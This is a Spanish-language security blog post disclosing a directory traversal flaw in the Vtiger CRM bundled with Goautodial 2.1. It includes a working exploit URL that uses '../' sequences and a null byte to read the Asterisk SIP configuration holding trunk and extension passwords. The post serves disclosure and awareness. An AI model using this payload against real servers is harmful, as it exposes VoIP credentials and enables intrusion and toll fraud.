Vulnerabilidad de directorios transversales en Goautodial 2.1

Como saben este famoso software de marcación predictiva, trae Vtiger como software para CRM, por defecto, ultimamente estoy trabajando mucho con este software, así que, como siempre no esta demás probar, como dirían los colegas “las fijas”.

A través de Vtiger, es posible explotar una vulnerabilidad que permite visualizar los archivos locales del servidor goautodial, mediante la manipulación de URL , esto sucede en Goautodial 2.1 , aquí algunos ejemplos.

1.- Detectando Vtiger en Goautodial 2.1

goautodial-21-fileinclution

2.- Explotando la vulnerabilidad , visualizando el archivo de troncales, extensiones y contraseñas

goautodial-21-fileinclution

URL : http://IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip-vicidial.conf%00

Si bien es cierto, esta es una vulnerabilidad ya reportada en vtiger (http://osvdb.org/show/osvdb/80552) , al parecer la gente de Goautodial aun no corrige la versión.

Bueno espero les sirva la información y a tomar sus recaudos

UPDATE 20/03/2014

Hace poco me hicieron una entrevista en donde, me filmaron haciendo una demostración de esta vulnerabilidad , a continuación les comparto el vídeo:

Anuncios
Esta entrada fue publicada en Manuales y tutoriales por jroliva. Guarda el enlace permanente.

Acerca de jroliva

Juan Oliva, es un consultor de seguridad informática y telefonía IP con 10 años de experiencia en el campo . Muy involucrado en proyectos de pruebas de penetración , análisis y explotación vulnerabilidades, pruebas de ingeniería social, seguridad física, revisión de código, entre otras tareas de seguridad informática. Así mismo, desarrolla proyectos de implementación y mantenimiento de VoIP, basadas en Asterisk y Elastix, proyectos de callcenter, soluciones en la nube y hosted PBX, Aseguramiento de plataformas Linux, Windows. Ha estado trabajando para una variedad de empresas en donde ha desarrollado proyectos para el estado peruano, así como para entidades privadas, nacionales y del extranjero, cuenta con certificaciones vigentes en Ethical hacking, Linux y telefonía IP. Es instructor de cursos de Ethical Hacking y certificaciónes como Linux Professional Institute y Elastix, donde ha tenido oportunidad de realizar capacitaciones en el Perú, así como en el extranjero. Es investigador de vulnerabilidades, y creador de contenidos, que son publicados en su blog personal jroliva.wordpress.com el cual mantiene desde hace mas de 6 años.

5 pensamientos en “Vulnerabilidad de directorios transversales en Goautodial 2.1

  1. I enjoyed having a look at this Blog.
    Free Software has really been making or performing a new school and opening mind for free Software Technology.
    Either we get along and try to work in community, or new challenges will make us face hard failure.

    Congratulations for your initiatives and courage to start helping people to develop their own devices on Linux, Open Source.

    Go ahead supporting new discoveries and new way to see the New World.
    Stark

  2. Pingback: Explotando vulnerabilidad PHP CODE INYECTION en VTIGER 5.2.1 | Juan Oliva

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s